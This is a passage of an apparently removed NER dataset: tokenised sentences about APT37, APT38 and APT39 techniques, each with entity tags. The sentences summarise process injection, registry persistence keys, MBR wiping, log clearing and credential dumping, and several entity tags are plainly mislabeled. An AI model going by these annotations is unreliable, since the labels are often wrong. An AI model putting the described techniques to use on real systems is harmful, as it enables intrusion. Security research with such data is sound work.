"Limited.”" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "sent", - "spearphishing", - "attachments", - "attempting", - "to", - "get", - "a", - "user", - "to", - "open", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "leverages", - "the", - "Windows", - "API", - "calls:", - "VirtualAlloc(),", - "WriteProcessMemory(),", - "and", - "CreateRemoteThread()", - "for", - "process", - "injection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "obfuscates", - "strings", - "and", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "a", - "Bluetooth", - "device", - "harvester,", - "which", - "uses", - "Windows", - "Bluetooth", - "APIs", - "to", - "find", - "information", - "on", - "connected", - "Bluetooth", - "devices." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37's", - "Freenki", - "malware", - "lists", - "running", - "processes", - "using", - "the", - "Microsoft", - "Windows", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "injects", - "its", - "malware", - "variant,", - "ROKRAT,", - "into", - "the", - "cmd.exe", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "used", - "Python", - "scripts", - "to", - "execute", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37's", - "has", - "added", - "persistence", - "via", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT37", - "has", - "created", - "scheduled", - "tasks", - "to", - "run", - "malicious", - "scripts", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "delivers", - "malware", - "using", - "spearphishing", - "emails", - "with", - "malicious", - "HWP", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT37", - "uses", - "steganography", - "to", - "send", - "images", - "to", - "users", - "that", - "are", - "embedded", - "with", - "shellcode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "collects", - "the", - "computer", - "name,", - "the", - "BIOS", - "model,", - "and", - "execution", - "path." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "identifies", - "the", - "victim", - "username." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "used", - "malware", - "that", - "will", - "issue", - "the", - "command", - "<code>shutdown", - "/r", - "/t", - "1</code>", - "to", - "reboot", - "a", - "system", - "after", - "wiping", - "its", - "MBR." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "executes", - "shellcode", - "and", - "a", - "VBA", - "script", - "to", - "decode", - "Base64", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "uses", - "HTTPS", - "to", - "conceal", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "used", - "the", - "command-line", - "interface." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "collected", - "browser", - "bookmark", - "information", - "to", - "learn", - "more", - "about", - "compromised", - "hosts,", - "obtain", - "personal", - "information", - "about", - "users,", - "and", - "acquire", - "details", - "about", - "internal", - "network", - "resources." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "brute", - "force", - "techniques", - "to", - "attempt", - "account", - "access", - "when", - "passwords", - "are", - "unknown", - "or", - "when", - "password", - "hashes", - "are", - "unavailable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "clears", - "Window", - "Event", - "logs", - "and", - "Sysmon", - "logs", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "used", - "a", - "Trojan", - "called", - "KEYLIME", - "to", - "collect", - "data", - "from", - "the", - "clipboard." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "CHM", - "files", - "to", - "move", - "concealed", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "cron", - "to", - "create", - "pre-scheduled", - "and", - "periodic", - "background", - "jobs", - "on", - "a", - "Linux", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "a", - "custom", - "secure", - "delete", - "function", - "to", - "make", - "deleted", - "files", - "unrecoverable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "Hermes", - "ransomware", - "to", - "encrypt", - "files", - "with", - "AES256." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "APT38", - "has", - "collected", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "have", - "created", - "firewall", - "exemptions", - "on", - "specific", - "ports,", - "including", - "ports", - "443,", - "6443,", - "8443,", - "and", - "9443." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "a", - "custom", - "MBR", - "wiper", - "named", - "BOOTWRECK", - "to", - "render", - "systems", - "inoperable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "conducted", - "watering", - "holes", - "schemes", - "to", - "gain", - "initial", - "access", - "to", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "a", - "utility", - "called", - "CLOSESHAVE", - "that", - "can", - "securely", - "delete", - "a", - "file", - "from", - "the", - "system.", - "They", - "have", - "also", - "removed", - "malware,", - "tools,", - "or", - "other", - "non-native", - "files", - "used", - "during", - "the", - "intrusion", - "to", - "reduce", - "their", - "footprint", - "or", - "as", - "part", - "of", - "the", - "post-intrusion", - "cleanup", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "have", - "enumerated", - "files", - "and", - "directories,", - "or", - "searched", - "in", - "specific", - "locations", - "within", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "prepended", - "a", - "space", - "to", - "all", - "of", - "their", - "terminal", - "commands", - "to", - "operate", - "without", - "leaving", - "traces", - "in", - "the", - "HISTCONTROL", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT38", - "used", - "a", - "backdoor,", - "NESTEGG,", - "that", - "has", - "the", - "capability", - "to", - "download", - "and", - "upload", - "files", - "to", - "and", - "from", - "a", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "used", - "a", - "Trojan", - "called", - "KEYLIME", - "to", - "capture", - "keystrokes", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "attempted", - "to", - "lure", - "victims", - "into", - "enabling", - "malicious", - "macros", - "within", - "email", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "APT38", - "uses", - "a", - "tool", - "called", - "CLEANTOAD", - "that", - "has", - "the", - "capability", - "to", - "modify", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "the", - "Windows", - "API", - "to", - "execute", - "code", - "within", - "a", - "victim's", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "enumerated", - "network", - "shares", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "PowerShell", - "to", - "execute", - "commands", - "and", - "other", - "operational", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "leveraged", - "Sysmon", - "to", - "understand", - "the", - "processes,", - "services", - "in", - "the", - "organization." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "rundll32.exe", - "to", - "execute", - "binaries,", - "scripts,", - "and", - "Control", - "Panel", - "Item", - "files", - "and", - "to", - "execute", - "code", - "via", - "proxy", - "to", - "avoid", - "triggering", - "security", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "DYEPACK.FOX", - "to", - "manipulate", - "PDF", - "data", - "as", - "it", - "is", - "accessed", - "to", - "remove", - "traces", - "of", - "fraudulent", - "SWIFT", - "transactions", - "from", - "the", - "data", - "displayed", - "to", - "the", - "end", - "user." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "Task", - "Scheduler", - "to", - "run", - "programs", - "at", - "system", - "startup", - "or", - "on", - "a", - "scheduled", - "basis", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "identified", - "security", - "software,", - "configurations,", - "defensive", - "tools,", - "and", - "sensors", - "installed", - "on", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "created", - "new", - "services", - "or", - "modified", - "existing", - "ones", - "to", - "run", - "executables,", - "commands,", - "or", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "several", - "code", - "packing", - "methods", - "such", - "as", - "Themida,", - "Enigma,", - "VMProtect,", - "and", - "Obsidium,", - "to", - "pack", - "their", - "implants." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "conducted", - "spearphishing", - "campaigns", - "using", - "malicious", - "email", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "B-Tool", - "B-Tool" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "DYEPACK", - "to", - "create,", - "delete,", - "and", - "alter", - "records", - "in", - "databases", - "used", - "for", - "SWIFT", - "transactions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "attempted", - "to", - "get", - "detailed", - "information", - "about", - "a", - "compromised", - "host,", - "including", - "the", - "operating", - "system,", - "version,", - "patches,", - "hotfixes,", - "and", - "service", - "packs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "installed", - "a", - "port", - "monitoring", - "tool,", - "MAPMAKER,", - "to", - "print", - "the", - "active", - "TCP", - "connections", - "on", - "the", - "local", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "identified", - "primary", - "users,", - "currently", - "logged", - "in", - "users,", - "sets", - "of", - "users", - "that", - "commonly", - "use", - "a", - "system,", - "or", - "inactive", - "users." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "a", - "custom", - "MBR", - "wiper", - "named", - "BOOTWRECK,", - "which", - "will", - "initiate", - "a", - "system", - "reboot", - "after", - "wiping", - "the", - "victim's", - "MBR." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "modified", - "data", - "timestamps", - "to", - "mimic", - "files", - "that", - "are", - "in", - "the", - "same", - "folder", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "obtained", - "and", - "used", - "open-source", - "tools", - "such", - "as", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "DYEPACK", - "to", - "manipulate", - "SWIFT", - "messages", - "en", - "route", - "to", - "a", - "printer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "VBScript", - "to", - "execute", - "commands", - "and", - "other", - "operational", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "used", - "a", - "backdoor,", - "QUICKRIDE,", - "to", - "communicate", - "to", - "the", - "C2", - "server", - "over", - "HTTP", - "and", - "HTTPS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "web", - "shells", - "for", - "persistence", - "or", - "to", - "ensure", - "redundant", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "used", - "a", - "command-line", - "tunneler,", - "NACHOCHEESE,", - "to", - "give", - "them", - "shell", - "access", - "to", - "a", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT38", - "has", - "installed", - "a", - "new", - "Windows", - "service", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "malware", - "to", - "set", - "<code>LoadAppInit_DLLs</code>", - "in", - "the", - "Registry", - "key", - "<code>SOFTWARE\\Microsoft\\Windows", - "NT\\CurrentVersion\\Windows</code>", - "in", - "order", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "WinRAR", - "and", - "7-Zip", - "to", - "compress", - "an", - "archive", - "stolen", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "utilized", - "AutoIt", - "malware", - "scripts", - "embedded", - "in", - "Microsoft", - "Office", - "documents", - "or", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "the", - "BITS", - "protocol", - "to", - "exfiltrate", - "stolen", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "communicated", - "with", - "C2", - "through", - "files", - "uploaded", - "to", - "and", - "downloaded", - "from", - "DropBox." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "Ncrack", - "to", - "reveal", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "tools", - "capable", - "of", - "stealing", - "contents", - "of", - "the", - "clipboard." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "malware", - "to", - "turn", - "off", - "the", - "<code>RequireSigned</code>", - "feature", - "which", - "ensures", - "only", - "signed", - "DLLs", - "can", - "be", - "run", - "on", - "Windows." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "utilized", - "custom", - "scripts", - "to", - "perform", - "internal", - "reconnaissance." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "the", - "Smartftp", - "Password", - "Decryptor", - "tool", - "to", - "decrypt", - "FTP", - "passwords." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "remote", - "access", - "tools", - "that", - "leverage", - "DNS", - "in", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "various", - "tools", - "to", - "steal", - "files", - "from", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "malware", - "to", - "decrypt", - "encrypted", - "CAB", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "malware", - "to", - "drop", - "encrypted", - "CAB", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "exfiltrated", - "stolen", - "victim", - "data", - "through", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "SQL", - "injection", - "for", - "initial", - "compromise." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "various", - "tools", - "to", - "proxy", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "malware", - "to", - "delete", - "files", - "after", - "they", - "are", - "deployed", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "tools", - "with", - "the", - "ability", - "to", - "search", - "for", - "files", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "downloaded", - "tools", - "to", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "utilized", - "tools", - "to", - "capture", - "mouse", - "movements." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "APT39", - "used", - "custom", - "tools", - "to", - "create", - "SOCK5", - "and", - "custom", - "protocol", - "proxies", - "between", - "infected", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "tools", - "for", - "capturing", - "keystrokes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "Mimikatz,", - "Windows", - "Credential", - "Editor", - "and", - "ProcDump", - "to", - "dump", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "created", - "accounts", - "on", - "multiple", - "compromised", - "hosts", - "to", - "perform", - "actions", - "within", - "the", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "utilized", - "tools", - "to", - "aggregate", - "data", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "sent", - "spearphishing", - "emails", - "in", - "an", - "attempt", - "to", - "lure", - "users", - "to", - "click", - "on", - "a", - "malicious", - "attachment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "sent", - "spearphishing", - "emails", - "in", - "an", - "attempt", - "to", - "lure", - "users", - "to", - "click", - "on", - "a", - "malicious", - "link." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "malware", - "disguised", - "as", - "Mozilla", - "Firefox", - "and", - "a", - "tool", - "named", - "mfevtpse.exe", - "to", - "proxy", - "C2", - "communications,", - "closely", - "mimicking", - "a", - "legitimate", - "McAfee", - "file", - "mfevtps.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "CrackMapExec", - "and", - "a", - "custom", - "port", - "scanner", - "known", - "as", - "BLUETORCH", - "for", - "network", - "scanning." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "the", - "post", - "exploitation", - "tool", - "CrackMapExec", - "to", - "enumerate", - "network", - "shares." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - 